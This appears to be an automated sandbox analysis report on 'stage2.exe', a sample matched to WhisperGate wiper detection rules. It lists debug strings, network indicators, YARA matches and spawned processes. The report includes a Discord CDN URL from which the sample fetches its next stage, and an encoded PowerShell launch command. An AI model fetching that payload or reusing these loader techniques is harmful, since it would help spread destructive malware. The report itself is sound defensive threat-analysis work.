Source:	Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source:	Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source:	Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

Networking:

Yara detected MSILDownloaderGeneric

Source: Yara match

File source: Process Memory Space: stage2.exe PID: 7084, type: MEMORYSTR

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 17 Jan 2022 01:25:24 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 223Connection: closeCF-Ray: 6cebca1adc534a68-FRACache-Control: private, max-age=0Expires: Mon, 17 Jan 2022 01:25:24 GMTVary: Accept-EncodingCF-Cache-Status: MISSAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"X-GUploader-UploadID: ADPycds5oM3NpZ9AylXZpGVOB9ntKzX9oHiZ36JltKQWVbDwXaSj4icPcReICi5s5vNaRHT4QvI_mIj3uwpfm47zzoOikFzaRAX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfbSACd0FpP8AarT40rUdyTU16oiVuL8ktNluhrU0TLjW%2BTGsBj6c0zZg%2FW2Tg%2BHLybyYjE0%2BAX8GvswXYherK%2BwZycY1622%2BqIiXLXq84wLdlCovP450WnSVpVht58ekJr99w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare

Source: stage2.exe, 00000001.00000000.438989759.000000000337A000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.339502555.0000000000FB3000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.426449347.0000000000DCD000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000D.00000002.432860821.0000000009220000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png$
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.340839036.0000000004DC1000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427485435.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: Amcache.hve.26.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html$
Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: stage2.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg
Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com4
Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester$
Source: powershell.exe, 00000002.00000002.341684839.0000000005150000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.429277847.0000000004FA7000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: WerFault.exe, 0000001A.00000002.478119853.0000000000DAA000.00000004.00000001.sdmp	String found in binary or memory: https://watson.telemetry)

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic

HTTP traffic detected: GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2

System Summary:

Uses 32bit PE files

Source: stage2.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Yara signature match

Source: stage2.exe, type: SAMPLE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: stage2.exe, type: SAMPLE	Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: stage2.exe, type: SAMPLE	Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE	Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE	Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: Process Memory Space: powershell.exe PID: 7160, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 7140, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28

One or more processes crash

Source: C:\Users\user\Desktop\stage2.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04A6CB10	2_2_04A6CB10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E75768	2_2_07E75768
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E76728	2_2_07E76728
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E78320	2_2_07E78320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E78310	2_2_07E78310
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E79058	2_2_07E79058
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E71B88	2_2_07E71B88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E78320	2_2_07E78320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E79820	2_2_07E79820
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07EA7E00	2_2_07EA7E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07EA7E00	2_2_07EA7E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E71B78	2_2_07E71B78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A3DFA8	13_2_07A3DFA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A3F278	13_2_07A3F278
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A341F0	13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A30040	13_2_07A30040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A341F0	13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A3EF20	13_2_07A3EF20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A341F0	13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A341F0	13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A341F0	13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A30040	13_2_07A30040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A67E00	13_2_07A67E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A67E00	13_2_07A67E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_080D8C28	13_2_080D8C28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_080D8C18	13_2_080D8C18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_080DA6B8	13_2_080DA6B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_080DA6B2	13_2_080DA6B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A3A16F	13_2_07A3A16F

Sample file is different than original file name gathered from version info

Source: stage2.exe, 00000001.00000000.439903603.0000000000EA8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
Source: stage2.exe, 00000001.00000002.480852082.000000000161A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs stage2.exe
Source: stage2.exe, 00000001.00000000.438479767.000000000161A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs stage2.exe
Source: stage2.exe	Binary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe

PE file contains strange resources

Source: stage2.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

PE / OLE file has an invalid certificate

Source: stage2.exe

Static PE information: invalid certificate

Source: stage2.exe	Virustotal: Detection: 44%
Source: stage2.exe	ReversingLabs: Detection: 48%

Source: C:\Users\user\Desktop\stage2.exe

File read: C:\Users\user\Desktop\stage2.exe

Source: unknown	Process created: C:\Users\user\Desktop\stage2.exe "C:\Users\user\Desktop\stage2.exe"
Source: C:\Users\user\Desktop\stage2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\stage2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\stage2.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
Source: C:\Users\user\Desktop\stage2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==	Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==	Jump to behavior

Source: C:\Users\user\Desktop\stage2.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7084
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01

Source: C:\Users\user\Desktop\stage2.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: stage2.exe, Facade.cs	.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.stage2.exe.ea0000.0.unpack, Facade.cs	.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.stage2.exe.ea0000.1.unpack, Facade.cs	.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.stage2.exe.ea0000.0.unpack, Facade.cs	.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.stage2.exe.ea0000.2.unpack, Facade.cs	.Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E77471 push C033084Eh; ret	2_2_07E77482
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E773CF push C033084Eh; ret	2_2_07E773E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E7F1A0 push eax; ret	2_2_07E7F1B3
